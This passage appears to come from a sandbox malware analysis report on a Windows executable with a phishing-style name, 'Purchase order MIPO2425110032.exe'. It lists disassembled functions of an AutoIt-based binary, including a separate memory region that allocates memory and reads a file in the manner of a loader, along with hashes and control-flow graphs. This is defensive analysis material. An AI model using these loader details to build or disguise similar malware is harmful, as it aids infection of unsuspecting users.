                                                              • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                              • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                              • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                              • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00A9FE80,000000FF,00000000), ref: 00410552
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                            • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                            • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                            • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                            Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _malloc
                                                            • String ID: Default
                                                            • API String ID: 1579825452-753088835
                                                            • Opcode ID: 402bc54fe20d6e454d76b6e8cfb9dcc7ec7ccbd5fe5f214277c1902a6b6f839c
                                                            • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                            • Opcode Fuzzy Hash: 402bc54fe20d6e454d76b6e8cfb9dcc7ec7ccbd5fe5f214277c1902a6b6f839c
                                                            • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                            Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1970 40f696-40f69c 1966->1970 1968 40f660-40f674 call 4150d1 1967->1968 1969 40f63e 1967->1969 1974 40f679-40f67c 1968->1974 1971 40f640 1969->1971 1973 40f642-40f650 1971->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1968 1977->1971 1991 425d43-425d5f call 414d30 1978->1991 1979->1975 1982 40f6b4-40f6c2 1980->1982 1983 40f6af-40f6b2 1980->1983 1984 425d16 1982->1984 1985 40f6c8-40f6d6 1982->1985 1983->1975 1984->1978 1987 425d05-425d0b 1985->1987 1988 40f6dc-40f6df 1985->1988 1987->1973 1990 425d11 1987->1990 1988->1975 1990->1984 1991->1970
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_fseek_memmove_strcat
                                                            • String ID: AU3!$EA06
                                                            • API String ID: 1268643489-2658333250
                                                            • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                            • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                            • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                            • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                            Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2002 40112c-401141 DefWindowProcW 1997->2002 2000 401184-40118e call 401250 1998->2000 2001 40114c-40114f 1998->2001 1999->1998 2003 401120-401126 1999->2003 2011 401193-40119a 2000->2011 2004 401151-401157 2001->2004 2005 40119d 2001->2005 2003->2002 2007 42b038-42b03f 2003->2007 2008 401219-40121f 2004->2008 2009 40115d 2004->2009 2012 4011a3-4011a9 2005->2012 2013 42afb4-42afc5 call 40f190 2005->2013 2007->2002 2010 42b045-42b059 call 401000 call 40e0c0 2007->2010 2008->2003 2016 401225-42b06d call 468b0e 2008->2016 2014 401163-401166 2009->2014 2015 42b01d-42b024 2009->2015 2010->2002 2012->2003 2019 4011af 2012->2019 2013->2011 2021 42afe9-42b018 call 40f190 call 401a50 2014->2021 2022 40116c-401172 2014->2022 2015->2002 2020 42b02a-42b033 call 4370f4 2015->2020 2016->2011 2019->2003 2026 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2019->2026 2027 4011db-401202 SetTimer RegisterWindowMessageW 2019->2027 2020->2002 2021->2002 2022->2003 2030 401174-42afde call 45fd57 2022->2030 2027->2011 2028 401204-401216 CreatePopupMenu 2027->2028 2030->2002 2045 42afe4 2030->2045 2045->2011
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                            • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                            • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                            • CreatePopupMenu.USER32 ref: 00401204
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                            • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                            • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                            • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                            Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                            APIs
                                                            • _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                            • std::exception::exception.LIBCMT ref: 00411626
                                                            • std::exception::exception.LIBCMT ref: 00411640
                                                            • __CxxThrowException@8.LIBCMT ref: 00411651
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                            • String ID: ,*H$4*H$@fI
                                                            • API String ID: 615853336-1459471987
                                                            • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                            • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                            • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                            • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                            Function 03FA2648 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2065 3fa2648-3fa26f6 call 3fa0048 2068 3fa26fd-3fa2723 call 3fa3558 CreateFileW 2065->2068 2071 3fa272a-3fa273a 2068->2071 2072 3fa2725 2068->2072 2079 3fa273c 2071->2079 2080 3fa2741-3fa275b VirtualAlloc 2071->2080 2073 3fa2875-3fa2879 2072->2073 2075 3fa28bb-3fa28be 2073->2075 2076 3fa287b-3fa287f 2073->2076 2081 3fa28c1-3fa28c8 2075->2081 2077 3fa288b-3fa288f 2076->2077 2078 3fa2881-3fa2884 2076->2078 2082 3fa289f-3fa28a3 2077->2082 2083 3fa2891-3fa289b 2077->2083 2078->2077 2079->2073 2084 3fa275d 2080->2084 2085 3fa2762-3fa2779 ReadFile 2080->2085 2086 3fa28ca-3fa28d5 2081->2086 2087 3fa291d-3fa2932 2081->2087 2090 3fa28b3 2082->2090 2091 3fa28a5-3fa28af 2082->2091 2083->2082 2084->2073 2092 3fa277b 2085->2092 2093 3fa2780-3fa27c0 VirtualAlloc 2085->2093 2094 3fa28d9-3fa28e5 2086->2094 2095 3fa28d7 2086->2095 2088 3fa2942-3fa294a 2087->2088 2089 3fa2934-3fa293f VirtualFree 2087->2089 2089->2088 2090->2075 2091->2090 2092->2073 2096 3fa27c2 2093->2096 2097 3fa27c7-3fa27e2 call 3fa37a8 2093->2097 2098 3fa28f9-3fa2905 2094->2098 2099 3fa28e7-3fa28f7 2094->2099 2095->2087 2096->2073 2105 3fa27ed-3fa27f7 2097->2105 2101 3fa2912-3fa2918 2098->2101 2102 3fa2907-3fa2910 2098->2102 2100 3fa291b 2099->2100 2100->2081 2101->2100 2102->2100 2106 3fa282a-3fa283e call 3fa35b8 2105->2106 2107 3fa27f9-3fa2828 call 3fa37a8 2105->2107 2113 3fa2842-3fa2846 2106->2113 2114 3fa2840 2106->2114 2107->2105 2115 3fa2848-3fa284c CloseHandle 2113->2115 2116 3fa2852-3fa2856 2113->2116 2114->2073 2115->2116 2117 3fa2858-3fa2863 VirtualFree 2116->2117 2118 3fa2866-3fa286f 2116->2118 2117->2118 2118->2068 2118->2073
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03FA2719
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03FA293F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                            • Instruction ID: 657b5b652787f24efc3a32f8273eeb766aef97fc3b05a35063544096c3e6cf77
                                                            • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                            • Instruction Fuzzy Hash: 0BA13AB4E00609EBDB14CFA8C994BEEBBB5FF48305F208599E505BB280D7799A40CF50
                                                            Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2119 4102b0-4102c5 SHGetMalloc 2120 4102cb-4102da SHGetDesktopFolder 2119->2120 2121 425dfd-425e0e call 433244 2119->2121 2122 4102e0-41031a call 412fba 2120->2122 2123 41036b-410379 2120->2123 2131 410360-410368 2122->2131 2132 41031c-410331 SHGetPathFromIDListW 2122->2132 2123->2121 2129 41037f-410384 2123->2129 2131->2123 2133 410351-41035d 2132->2133 2134 410333-41034a call 412fba 2132->2134 2133->2131 2134->2133
                                                            APIs
                                                            • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                            • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                            • _wcsncpy.LIBCMT ref: 004102ED
                                                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                            • _wcsncpy.LIBCMT ref: 00410340
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                            • String ID: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe
                                                            • API String ID: 3170942423-232679026
                                                            • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                            • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                            • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                            • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                            Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2137 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2140 427190-4271ae RegQueryValueExW 2137->2140 2141 40e4eb-40e4f0 2137->2141 2142 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2140->2142 2143 42721a-42722a RegCloseKey 2140->2143 2148 427210-427219 call 436508 2142->2148 2149 4271f7-42720e call 402160 2142->2149 2148->2143 2149->2148
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$CloseOpen
                                                            • String ID: Include$Software\AutoIt v3\AutoIt
                                                            • API String ID: 1586453840-614718249
                                                            • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                            • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                            • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                            • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                            Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2154 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                            • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                            • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                            • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                            • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                            • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                            Function 03FA23F8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 03FA22E8: Sleep.KERNELBASE(000001F4), ref: 03FA22F9
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03FA253E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: DI9H625VKOM8IVXV3FMWXX7
                                                            • API String ID: 2694422964-3819048530
                                                            • Opcode ID: 918c44a81e9581ce52b631478bfc170695394f06bf90b4403560ada46b8feece
                                                            • Instruction ID: 0b323ad294622ffaa67a7227efc5fe0e8d3e1a3cadbf24995a444c13544f2d5f
                                                            • Opcode Fuzzy Hash: 918c44a81e9581ce52b631478bfc170695394f06bf90b4403560ada46b8feece
                                                            • Instruction Fuzzy Hash: 43619470E04289EBEF11DBE8C854BEEBBB4AF15300F044599E2487B2C1D7BA0B45CB65
                                                            Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • _wcsncpy.LIBCMT ref: 00401C41
                                                            • _wcscpy.LIBCMT ref: 00401C5D
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                            • String ID: Line:
                                                            • API String ID: 1874344091-1585850449
                                                            • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                            • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                            • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                            • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                            Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                            • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                            • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                            • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
